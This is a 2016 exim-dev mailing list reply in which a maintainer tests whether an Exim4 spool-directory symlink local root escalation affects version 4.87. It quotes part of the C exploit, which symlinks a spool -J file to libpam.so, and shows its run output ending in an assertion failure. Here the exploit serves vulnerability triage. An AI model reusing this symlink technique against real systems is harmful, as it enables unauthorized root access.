Re: [exim-dev] Exim4 spool directory symlink local root escalation - does this apply to 4.87?

Andreas Metzler Sun, 11 Sep 2016 10:24:06 -0700

On 2016-09-11 Jeremy Harris <j...@wizmail.org> wrote:
> On 11/09/16 17:16, Andreas Metzler wrote:
> >> And... is that
> >> repeat-by relying on the writability of a library directory
> >> by an unpriv process?
> > 
> > /lib/x86_64-linux-gnu/ is 0755 root:root.


> In that case I'm not seeing how this stage works:

> - Symlink /var/spool/exim4/input/xxxxxx-xxxxxx-xx-J to
> /lib/x86_64-linux-gnu/libpam.so.0.83.1

> Perhaps I'm not understanding "to".  What is the "ls -l" output for
> the symlink just created?

    strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
    dirStruct=opendir("/var/spool/exim4/msglog");
    assert(dirStruct);
    result=1;
    while(result) {
      while((dirEnt=readdir(dirStruct))) {
        if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
        strncpy(linkPath+23, dirEnt->d_name, 16);
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
        result=symlink(TARGET_PATH, linkPath);
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
        assert(!result);
        fprintf(stderr, "Relinked %s\n", linkPath);
        break;

...

$ /tmp/EximUpgrade --Upgrade
-rw-r--r-- 1 root        root        60104 May 18 00:22 
/lib/x86_64-linux-gnu/libpam.so.0.83.1

/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root        root        60104 May 18 00:22 
/lib/x86_64-linux-gnu/libpam.so.0.83.1

/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root        root        60104 May 18 00:22 
/lib/x86_64-linux-gnu/libpam.so.0.83.1

/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
lrwxrwxrwx 1 Debian-exim Debian-exim  38 Sep 11 17:20 1bj8R0-0004c9-JG-J -> 
/lib/x86_64-linux-gnu/libpam.so.0.83.1
Relinked /var/spool/exim4/input/1bj8R0-0004c9-JG-J
Target ready for writing
EximUpgrade: EximUpgrade-debugme.c:163: main: Assertion 
`result==newStatData.st_size' failed.
Aborted

cu Andreas
-- 
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim 
details at http://www.exim.org/ ##

Re: [exim-dev] Exim4 spool directory symlink local root escalation - does this apply to 4.87?

Reply via email to